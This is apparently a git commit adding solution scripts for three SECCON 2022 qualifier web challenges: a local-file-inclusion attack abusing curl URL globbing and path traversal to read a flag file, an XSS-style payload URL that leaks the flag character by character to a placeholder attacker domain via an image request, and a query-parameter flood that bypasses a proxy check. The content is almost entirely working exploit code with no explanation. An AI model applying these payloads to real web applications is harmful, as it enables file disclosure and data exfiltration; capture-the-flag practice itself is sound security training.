Add web scripts

Author: hyunsikjeong

2022/seccon-quals-2022/easylfi/solve.py

@@ -0,0 +1,10 @@
+lmao = """{!</h1>
+</body>
+</html>
+--_curl_--file:///app/public/../../flag.txt
+SECCON}"""
+requests.get('http://easylfi.seccon.games:3000/{.}./{.}./{app/public/hello.html,flag.txt}', params={
+    "{": "}{",
+    "{name}": "{",
+    lmao: "pepega"
+})

2022/seccon-quals-2022/piyosay/README.md

@@ -0,0 +1,6 @@
+It's possible to get each character by:
+```
+http://piyosay.seccon.games:3000/result?emoji=emojis%2FownerDocument%2FdefaultView%2FDOMPurify%2Fremoved%2F0%2Felement%2FtextContent%2F{IDX}&message=%3Cimg%20src=https://{YOUR_DOMAIN}?b={{emoji}}%3C/img%3E%3Cd%60iv%3E%3Cdiv%3E
+```
+
+Change `{IDX}` and `{YOUR_DOMAIN}` to get the `{IDX}`-th character of the flag.

2022/seccon-quals-2022/skipinx/solve.py

@@ -0,0 +1,3 @@
+import requests
+URL = "http://skipinx.seccon.games:8080/?proxy=lol&" + "&".join(["a=b"]*1000)
+print(requests.get(URL).content)